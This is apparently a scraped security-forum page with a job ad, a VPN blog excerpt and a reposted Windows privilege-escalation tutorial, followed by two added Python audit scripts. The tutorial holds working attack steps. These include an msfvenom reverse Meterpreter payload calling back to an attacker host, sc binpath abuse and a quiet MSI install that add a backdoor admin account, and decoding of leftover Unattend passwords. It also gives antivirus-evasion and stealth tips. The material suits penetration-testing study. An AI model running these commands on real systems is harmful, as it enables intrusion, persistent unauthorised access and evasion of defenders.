• Strong ability to articulate business risks of deficiencies identified to client personnel;
• Identify and communicate findings to client personnel;
• Recognize performance improvement opportunities for clients.

Requirements:
• Bachelor’s degree in an IT related field
• Minimum 2 years of experience in IT audits
• Ability to identify risks and controls in various IT systems (applications, computer networks, operating systems, databases)
• Ability to test the IT controls (entity level, IT general controls, application level) and to identify compensating controls
• Basic knowledge of various IT environments
• Very good technical and business English
• Ability to identify and resolve IT related business issues and provide innovative solutions both for IT and business
• Work effectively either individually or as a member of a multi-skilled team
• Professional discipline, accuracy, reliability and excellent analytical skills
• Strong interpersonal skills, team spirit, resilience, flexibility, adaptability and self-motivation
• Certifications such as CISA, CISSP, CRISC or ISO27001 will be considered a plus

Our Offer:
• A competitive salary and benefits package
• The chance to develop a rewarding professional path and work on challenging assignments
• Support for professional qualifications and personal development through a strong mentoring program
• Work in a friendly team of security professionals who enjoy sharing their experience with colleagues
• The opportunity to participate in a wide variety of technical projects and client environments
• Flexible working program

We are looking forward to receiving your CV and letter of motivation, in English, until December 15th, 2015. Shortlisted candidates will be invited to interview.
Link: http://www.bestjobs.ro/locuri-de-munca-senior-it-auditor/228141/2

Note:
1. The job is not security related
2. It is aimed at people who have done this kind of work before

Info (I think): https://en.wikipedia.org/wiki/Information_technology_audit

If you need more information, you can PM me. If you want your CV to be seen quickly and by the right person, you can PM me.
-
Competition with the best hackers in the world, in Bucharest. ->
Nytro replied to TheOne's topic in Stiri securitate
A sponsorship from Starbucks, Gloria Jeans or who knows what would come in handy. It would bring even @aelius there, even if he were in Germany.
-
OpenVPN for paranoids

Tue 17 November 2015
By Victor Dorneanu

Continuing my admin series this time I'd like to setup a VPN using OpenVPN as a user-based VPN solution. Unlike IPSec solutions which require IPSec on both (server and client) sides, securing the VPN tunnel by OpenSSL is a more preferable option. In this post I'll try to show which steps have to be taken in order to:

- secure the communication channel
- use up-to-date (and secure!) TLS configurations
- prevent information leaks when the VPN tunnel is down

At least for the last one some additional steps are required to route your traffic only through the VPN tunnel. As a client you don't want your connection to be "downgraded" (in terms of security) without even realizing it. That's why you might want to restrict your routes and allow outbound connection only through the (virtual) interface dedicated to the VPN. How this is done and which methods exist, is covered later on.

Full article: OpenVPN for paranoids - blog.dornea.nu
-
Posted on November 24, 2015 by Jonathan

Common Windows Privilege Escalation Vectors

Imagine this scenario: You’ve gotten a Meterpreter session on a machine (HIGH FIVE!), and you opt for running getsystem in an attempt to escalate your privileges… but what if that proves unsuccessful? Should you throw in the towel? Only if you’re a quitter… but you’re not, are you? You’re a champion!!!

In this post I will walk us through common privilege escalation techniques on Windows, demonstrating how to “manually” accomplish each task as well as talk about any related Metasploit modules. While most techniques are easier to exploit when escalating from Local Administrator to SYSTEM, improperly configured machines can certainly allow escalation from unprivileged accounts in the right circumstances.

Note: In this post, we will focus on escalation techniques that do not rely on kernel exploits such as KiTrap0d (which just so happens to be one of four methods attempted by Meterpreter’s getsystem.)

Trusted Service Paths

This vulnerability deals with how Windows interprets spaces in a file path for a service binary. Given that these services often run as SYSTEM, there is an opportunity to escalate our privileges if we can exploit this behavior. For example, consider the following file path:

C:\Program Files\Some Folder\Service.exe

For each space in the above file path, Windows will attempt to look for and execute programs with a name that matches the word in front of the space. The operating system will try all possibilities throughout the entire length of the file path until it finds a match. Using the example above, Windows would try to locate and execute programs in the following order:

C:\Program.exe
C:\Program Files\Some.exe
C:\Program Files\Some Folder\Service.exe

Note: This behavior happens when a developer fails to enclose the file path in quotes. File paths that are properly quoted are treated as absolute and therefore mitigate this vulnerability.
As a result, you may see this vulnerability referred to as “Unquoted Service Paths.”

If we were to drop a properly-named malicious executable in an affected folder, upon a restart of the service, we could have our malicious program run as SYSTEM (in a majority of cases). However, prior to dropping an executable, we would have to ensure that we had the necessary privileges to the target folder (organizations with least privilege properly implemented would prevent us from dropping an executable at the root of the drive). Let’s go ahead and step through the process of identifying and exploiting this vulnerability…

To start, we can utilize the following one-line Windows Management Instrumentation (WMI) query, written by Danial Compton (@commonexploits), to list all unquoted service paths (minus built-in Windows services) on our compromised machine, GREED:

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

As you can see, we have a hit! The path for PFNet’s service binary is unquoted and contains spaces. If the stars align, we will also have the necessary folder permissions. Assuming we’ve already checked our permissions on the root of the drive, let’s use the built-in Windows tool, Integrity Control Access Control Lists (icacls), to view the permissions of the other affected folder in the path, Privacyware:

icacls "C:\Program Files (x86)\Privacyware"

Notice the first line: BUILTIN\Users:(OI)(CI)(M), which lists the permissions for unprivileged users. The (M) stands for Modify, which grants us, as an unprivileged user, the ability to read, write and delete files and subfolders within this directory. WHAT LUCK! We are now free to create and drop a malicious executable called Privatefirewall.exe… let’s begin!

Note: We would be able to accomplish the same task if we had Write (W) permissions to the Privacyware folder.
For more information on Windows permissions, check out the following MSDN link: File and Folder Permissions.

When creating an executable with MSFVenom, you may wish to have your payload simply add a user to the Local Administrators group (windows/adduser) or send you a reverse Meterpreter shell running as SYSTEM (as demonstrated below). Other options are certainly possible!

msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=10.0.0.100 LPORT=443 -f exe -o Privatefirewall.exe

Now that our malicious executable is in place, let’s try to stop and then restart the PFNet service in order to kick off our shell. To do this, we can utilize the built-in Service Control (sc) tool:

sc stop PFNet
sc start PFNet

LAME! As you can see above, while we have Modify permissions for certain folders within the service path, we don’t actually have permissions to interact with the PFNet service itself. In this scenario, we can wait for someone to restart the GREED machine or force a restart ourselves (stealthy the latter is not). Upon a restart of GREED, Windows locates and executes our Privatefirewall binary, sending us a shell with SYSTEM privileges. The world (or, at least, GREED) is all ours at this point!

Metasploit Module: exploit/windows/local/trusted_service_path

This module only requires that you link it to an existing Meterpreter session before running:

A review of the source code reveals that the module uses some regular expression magic to filter out any paths that are quoted or have no spaces in the path to create a list of vulnerable services. The module then attempts to exploit the first vulnerable service on the list by dropping a malicious service executable into the affected folder. The vulnerable service is then restarted, and afterwards, the module takes care of removing the malicious executable.
Note: I didn’t see anywhere in the module’s code that a check is performed as to whether we have appropriate access to the target directory prior to attempting to drop the executable. This seems a little odd to me…

Vulnerable Services

When discussing exploitation of Vulnerable Services, there are two main ideas that one can be referring to exploiting:

Service Binaries
Windows Services

The former is very similar to what we did with Trusted Service Paths. Whereas Trusted Service Paths exploits odd Windows file path interpretation in combination with folder permissions along the service path, Vulnerable Service Executables takes advantage of file/folder permissions pertaining to the actual executable itself. If the correct permissions are in place, we can simply replace the service executable with a malicious one of our own. Using Privacy Firewall as an example, we’d place an executable named pfsvc.exe into the “Privatefirewall 7.0” folder. VOILA!

The latter refers to the actual Windows Service and the ability to modify its properties. These Services run in the background and are controlled by the Operating System through the Service Control Manager (SCM), which issues commands to and receives updates from all Windows Services. If we can modify a Service’s binary path (binpath) property, upon a restart of the service, we can have the Service issue a command as SYSTEM on our behalf. Let’s take a look…

The easiest way to determine which Windows Services have vulnerable privileges is to utilize the AccessChk tool, which is part of the SysInternals Suite. This group of tools was written for Microsoft by Mark Russinovich to allow for advanced querying, managing and troubleshooting of systems and applications.
While it’s always a good idea to limit the amount of items that you allow to touch disk during a pentesting engagement, due to risk of anti-virus detection (among other concerns), since AccessChk is an official and well-known Microsoft tool, the chances of flagging any protective mechanisms on the machine are slim.

Once we have AccessChk downloaded on our target machine, GREED, we can run the following command to determine which Services can be modified by any authenticated user (regardless of privilege level):

accesschk.exe -uwcqv "Authenticated Users" * /accepteula

Well, what do we have here? PFNet shows its face once more! SERVICE_ALL_ACCESS means we have full control over modifying the properties of the PFNet Service. In most scenarios an unprivileged account should not have this type of control over a Windows Service, and often times these types of vulnerabilities occur due to misconfiguration by an Administrator or even the third-party developer (believe it or not, Windows XP SP0 actually had several built-in Services with this vulnerability *facepalm*).

Note: The PFNet Service was intentionally modified to be insecure for the purposes of this particular demonstration. This explains why we were unable to successfully control the service during the Trusted Service Paths walk-through.

Let’s utilize the Service Control (sc) utility to view the configuration properties of the PFNet Service:

sc qc PFNet

Notice that the BINARY_PATH_NAME value is set to point to pfsvc.exe, which we know is the associated service binary. Changing this value to a command to add a user and restarting the service will execute this command as SYSTEM (confirmed by validating SERVICE_START_NAME is set to LocalSystem). We can repeat the process one more time to add our new user to the Local Administrator group:

sc config PFNET binpath= "net user rottenadmin P@ssword123! /add"
sc stop PFNET
sc start PFNET
sc config PFNET binpath= "net localgroup Administrators rottenadmin /add"
sc stop PFNET
sc start PFNET

YIKES! The sc utility throws an error each time we start the service with one of our malicious commands in the binpath. This is because the net user and net localgroup commands do not point to the service binary and therefore the SCM cannot communicate with the service. Never fear, however, as the error is thrown only after issuing our malicious commands:

Note: I’d recommend setting the binpath property to point to the original service binary and having the service successfully started/running once you’ve completed your privilege escalation. This will allow normal Service behavior to resume and reduce drawing unwanted attention.

Now that we have an established account on GREED with Administrator privileges, it would be rather simple to escalate to SYSTEM in the future if needed (bit o’ Mimikatz, anyone?).

Metasploit Module: exploit/windows/local/service_permissions

This module only requires that you link it to an existing Meterpreter session before running:

This module tries two methods in an attempt to escalate to SYSTEM. First, if the Meterpreter session is currently running under Administrator privileges, the module will aim to create and run a new service. If the current account privileges do not allow for service creation, the module will then seek out to determine if weak folder or file permissions will allow for hijacking existing services. When creating new services or hijacking existing ones, the module creates an executable, which has a randomly-generated filename as well as installation folder path. Enabling the AGGRESSIVE option on this module will exploit every vulnerable service on the target host. With the option disabled, the module stops at the first successful escalation attempt.
AlwaysInstallElevated

AlwaysInstallElevated is a setting that allows non-privileged users the ability to run Microsoft Windows Installer Package Files (MSI) with elevated (SYSTEM) permissions. However, granting users this ability is a security concern because

For this to occur, there are two registry entries that have to be set to the value of “1” on the machine:

[HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer]
"AlwaysInstallElevated"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"AlwaysInstallElevated"=dword:00000001

The easiest way to check the values of these two registry entries is to utilize the built-in command line tool, reg query:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Note: If you happen to get an error message similar to: The system was unable to find the specified registry key or value, it may be that a Group Policy setting for AlwaysInstallElevated was never defined, and therefore an associated registry entry doesn’t exist.

Now that we know AlwaysInstallElevated is enabled for both the local machine and the current user, we can proceed to utilize MSFVenom to generate an MSI file that, when executed on the victim machine, will add a user to the Local Administrators group:

msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o rotten.msi

Once we have our newly created MSI file loaded on the victim, we can leverage a command-line tool within Windows, Msiexec, to covertly (in the background) run the installation:

msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\rotten.msi

The properties of the switches utilized in the above Msiexec command are below:

/quiet = Suppress any messages to the user during installation
/qn = No GUI
/i = Regular (vs. administrative) installation

Once run, we can check to validate that our account was created and added to the Local Administrator Group:

Note: MSI files created with MSFVenom as well as with the always_install_elevated module discussed below, will fail during installation. This behavior is intentional and meant to prevent the installation being registered with the operating system.

Metasploit Module: exploit/windows/local/always_install_elevated

As you can see below, this module simply requires that you link it to an existing session prior to running:

There is an advanced setting, called QUIET, that you’ll want to enable in most scenarios. Turning on QUIET acts the same as utilizing the /quiet switch as part of a Msiexec command. This ensures that all messages to the user are suppressed, keeping our activities covert. The module creates an MSI file with a randomly-generated filename and takes care of all cleanup after deployment.

Unattended Installs

Unattended Installs allow for the deployment of Windows with little-to-no active involvement from an administrator. This solution is ideal in larger organizations where it would be too labor and time-intensive to perform wide-scale deployments manually. If administrators fail to clean up after this process, an Extensible Markup Language (XML) file called Unattend is left on the local system. This file contains all the configuration settings that were set during the installation process, some of which can include the configuration of local accounts, to include Administrator accounts!

While it’s a good idea to search the entire drive, Unattend files are likely to be found within the following folders:

C:\Windows\Panther\
C:\Windows\Panther\Unattend\
C:\Windows\System32\
C:\Windows\System32\sysprep\

Note: In addition to Unattend.xml files, be on the lookout for sysprep.xml and sysprep.inf files on the file system.
These files can also contain credential information utilized during deployment of the operating system, allowing us to escalate privileges.

Once you’ve located an Unattend file, open it up and search for the <UserAccounts> tag. This section will define the settings for any local accounts (and sometimes even Domain accounts):

<UserAccounts>
  <LocalAccounts>
    <LocalAccount>
      <Password>
        <Value>UEBzc3dvcmQxMjMhUGFzc3dvcmQ=</Value>
        <PlainText>false</PlainText>
      </Password>
      <Description>Local Administrator</Description>
      <DisplayName>Administrator</DisplayName>
      <Group>Administrators</Group>
      <Name>Administrator</Name>
    </LocalAccount>
  </LocalAccounts>
</UserAccounts>

In the snippet of the sample Unattend file above, you can see a local account being created and added to the Administrators group. The administrator chose not to have the password stored in plaintext; however, it is merely obfuscated with Base64. As seen below, we can trivially decode it in Kali with the following:

echo "UEBzc3dvcmQxMjMhUGFzc3dvcmQ=" | base64 -d

So, our password is “P@ssword123!Password”? Not quite… Microsoft appends “Password” to all passwords within Unattend files before encoding them; therefore, our Local Administrator password is in fact just “P@ssword123!”.

Note: Under the <UserAccounts> section, you may also see <AdministratorPassword> tags, which are another way to configure the Local Administrator account.

Metasploit Module: post/windows/gather/enum_unattend

This module is relatively straightforward. The only action is to assign it to the active Meterpreter session we are interested in:

After a review of the source code, it appears that this module will only search for Unattend.xml files, and therefore, may miss stored credentials in related files such as sysprep.xml and sysprep.inf. On the positive side, this module will search the entire drive in an attempt to locate Unattend files.
Group Policy Preferences (GPP)

Please refer to my August 2015 blog post for a detailed walkthrough of exploiting GPP for privilege escalation: What You Know Bout GPP???.

!!! Important Note Regarding Anti-Virus !!!

During my testing, MSI and EXE binaries generated by MSFVenom as well as Metasploit Modules were flagged by some Anti-Virus (a/v) software. This is because the executable templates utilized by Metasploit are well-known to a/v vendors. For more information on why templates are flagged and how to evade detection, please see my September 2015 blog post: A/V Ain’t Got Nothing On Me!

Utilizing an obfuscation tool such as Veil-Evasion or creating your own executable by “compiling” PowerShell scripts (to add a user to the Administrators group, for example) stand a much better chance of bypassing any deployed a/v solution. Within Metasploit, modules offer an advanced option to substitute custom EXE and MSI binaries. Just be sure to set EXE::Custom or MSI::Custom to point to your binary prior to executing the module.

Additional Resources

Windows Privilege Escalation Fundamentals

This is an amazing resource put together by Ruben Boonen (@FuzzySec) and was indispensable during my preparation for the Offensive Security Certified Professional exam. Ruben touches on escalation techniques not covered in my post, such as searching the registry for credentials as well as exploiting scheduled tasks. Most definitely worth the read…

PowerUp

PowerUp is a PowerShell tool written by Will Schroeder (@harmj0y) that will query a victim machine in order to identify what privilege escalation vectors are present. With most of the vectors, if the machine is vulnerable, you can then utilize PowerUp for exploitation. Originally written in 2014 as a standalone tool, it has now been integrated into Empire, a post-exploitation, cryptographically-secure PowerShell agent.

Source: http://toshellandback.com/2015/11/24/ms-priv-esc/
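The "Trusted Service Paths" section of the post above explains the search Windows performs for an unquoted service path, and the WMI one-liner that lists candidates. The following Python helper is an added example, not code from the original post or from Metasploit: it models that search order, applies the same filters as the WMI query (auto-start, not under C:\Windows\, unquoted), lists the directories whose ACLs an administrator should review with icacls, and prints the sc command that fixes the registration by quoting the path. The service table inside it is constructed for the example and is not output from any real machine.

```python
"""Audit helper for unquoted service paths (added example, not the post's code).

The service list below is constructed; it mirrors the columns of
`wmic service get name,displayname,pathname,startmode` but is not real output.
"""
import ntpath

# Constructed sample: (name, pathname, startmode). PFNet and Privacyware are
# the names used in the post; the other rows are made up for contrast.
SAMPLE_SERVICES = [
    ("PFNet", r"C:\Program Files (x86)\Privacyware\Privatefirewall 7.0\pfsvc.exe", "Auto"),
    ("GoodSvc", r'"C:\Program Files\Vendor\Good Service\good.exe"', "Auto"),
    ("NoSpace", r"C:\Tools\svc.exe", "Auto"),
    ("Spooler", r"C:\Windows\System32\spoolsv.exe", "Auto"),
    ("Manual", r"C:\Program Files\Other Tool\tool.exe", "Manual"),
]


def is_quoted(pathname: str) -> bool:
    """A service path that starts with a double quote is treated as absolute."""
    return pathname.lstrip().startswith('"')


def search_candidates(pathname: str) -> list:
    """Executables Windows tries, in order, for an unquoted path.

    For every space, the text before it is tried as <prefix>.exe; the full
    path is tried last. A quoted path yields only the quoted executable.
    """
    if is_quoted(pathname):
        return [pathname.strip().split('"')[1]]
    candidates = []
    for i, ch in enumerate(pathname):
        if ch == " ":
            prefix = pathname[:i]
            candidates.append(prefix if prefix.lower().endswith(".exe") else prefix + ".exe")
    candidates.append(pathname)
    return candidates


def directories_to_audit(pathname: str) -> list:
    """Parent directory of every planting candidate (deduplicated, search order).

    These are the folders whose ACLs a defender checks with icacls: Modify (M)
    or Write (W) for BUILTIN\\Users on any of them makes the path exploitable.
    """
    seen, dirs = set(), []
    for cand in search_candidates(pathname)[:-1]:
        d = ntpath.dirname(cand)
        if d.lower() not in seen:
            seen.add(d.lower())
            dirs.append(d)
    return dirs


def find_unquoted_services(services) -> list:
    """Same filters as the post's WMI one-liner: auto-start, not under
    C:\\Windows\\, unquoted, and containing at least one space."""
    hits = []
    for name, pathname, startmode in services:
        if startmode.lower() != "auto":
            continue
        if pathname.lower().startswith("c:\\windows\\"):
            continue
        if is_quoted(pathname) or " " not in pathname:
            continue
        hits.append((name, pathname, search_candidates(pathname)))
    return hits


def remediation_command(name: str, pathname: str):
    """The fix: re-register the service with a quoted path. At a cmd.exe prompt
    the inner quotes are escaped as \\" inside the outer pair, and sc needs the
    space after 'binPath='. Returns None when the path is already quoted."""
    if is_quoted(pathname):
        return None
    return f'sc config {name} binPath= "\\"{pathname}\\""'


if __name__ == "__main__":
    for name, pathname, candidates in find_unquoted_services(SAMPLE_SERVICES):
        print(f"[!] {name}: {pathname}")
        for c in candidates:
            print(f"    would try: {c}")
        print("    review ACLs on:", ", ".join(directories_to_audit(pathname)))
        print("    fix:", remediation_command(name, pathname))
```

Run stand-alone it reports only PFNet from the sample table; feed it the parsed output of the WMI query (or `sc qc` for one service) to audit a real host, and apply the printed sc command from an elevated prompt to close the gap.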
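The "Unattended Installs" section above decodes a leftover Unattend.xml password by hand with base64 and notes the "Password" suffix Microsoft appends before encoding. The following Python parser is an added example, not code from the original post or from the Metasploit enum_unattend module: it walks the <UserAccounts> block, handles both <LocalAccount> and <AdministratorPassword>, and strips the suffix. The first sample is the post's own XML; the second is constructed to show the namespaced, UTF-16LE-encoded form that sysprep-generated files carry, and it assumes the suffix "AdministratorPassword" for that element (my assumption; the post only states the "Password" suffix).

```python
"""Decode account settings from an Unattend.xml (added example, not the post's code)."""
import base64
import xml.etree.ElementTree as ET

# The post's own sample snippet.
SAMPLE_UNATTEND = """<UserAccounts>
  <LocalAccounts>
    <LocalAccount>
      <Password>
        <Value>UEBzc3dvcmQxMjMhUGFzc3dvcmQ=</Value>
        <PlainText>false</PlainText>
      </Password>
      <Description>Local Administrator</Description>
      <DisplayName>Administrator</DisplayName>
      <Group>Administrators</Group>
      <Name>Administrator</Name>
    </LocalAccount>
  </LocalAccounts>
</UserAccounts>"""

# Constructed: a namespaced file of the kind sysprep writes, with an
# <AdministratorPassword> encoded from UTF-16LE text. Password is made up.
_ADMIN_B64 = base64.b64encode("Secret1!AdministratorPassword".encode("utf-16-le")).decode()
SAMPLE_NAMESPACED = f"""<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <UserAccounts>
        <AdministratorPassword>
          <Value>{_ADMIN_B64}</Value>
          <PlainText>false</PlainText>
        </AdministratorPassword>
      </UserAccounts>
    </component>
  </settings>
</unattend>"""


def _local(tag: str) -> str:
    """Strip an ElementTree '{namespace}' prefix so both samples walk alike."""
    return tag.rsplit("}", 1)[-1]


def _child(elem, name):
    return next((c for c in elem if _local(c.tag) == name), None)


def _text(elem, name) -> str:
    for node in elem.iter():
        if _local(node.tag) == name:
            return (node.text or "").strip()
    return ""


def decode_value(value: str, plaintext: bool, suffix: str) -> str:
    """Undo the obfuscation: Base64, then drop the appended suffix.

    Files written by Windows tooling encode UTF-16LE; the post's sample is
    plain ASCII, so the presence of NUL bytes decides which decoding to use.
    """
    if plaintext:
        return value
    raw = base64.b64decode(value)
    text = raw.decode("utf-16-le") if b"\x00" in raw else raw.decode("utf-8")
    return text[:-len(suffix)] if text.endswith(suffix) else text


def extract_accounts(xml_text: str) -> list:
    """Return (name, group, password) for each account under <UserAccounts>."""
    root = ET.fromstring(xml_text)
    found = []
    for elem in root.iter():
        tag = _local(elem.tag)
        if tag == "LocalAccount":
            pw = _child(elem, "Password")
            password = ""
            if pw is not None:
                password = decode_value(_text(pw, "Value"),
                                        _text(pw, "PlainText").lower() == "true", "Password")
            found.append((_text(elem, "Name"), _text(elem, "Group"), password))
        elif tag == "AdministratorPassword":
            password = decode_value(_text(elem, "Value"),
                                    _text(elem, "PlainText").lower() == "true",
                                    "AdministratorPassword")  # assumed suffix
            found.append(("Administrator", "Administrators", password))
    return found


if __name__ == "__main__":
    for sample in (SAMPLE_UNATTEND, SAMPLE_NAMESPACED):
        for name, group, password in extract_accounts(sample):
            print(f"account={name} group={group} password={password}")
```

Pointed at the folders the post lists (Panther, System32\sysprep and so on), a script like this turns up any leftover credentials so they can be rotated and the files removed; that cleanup, rather than the decoding, is the part that ends the exposure.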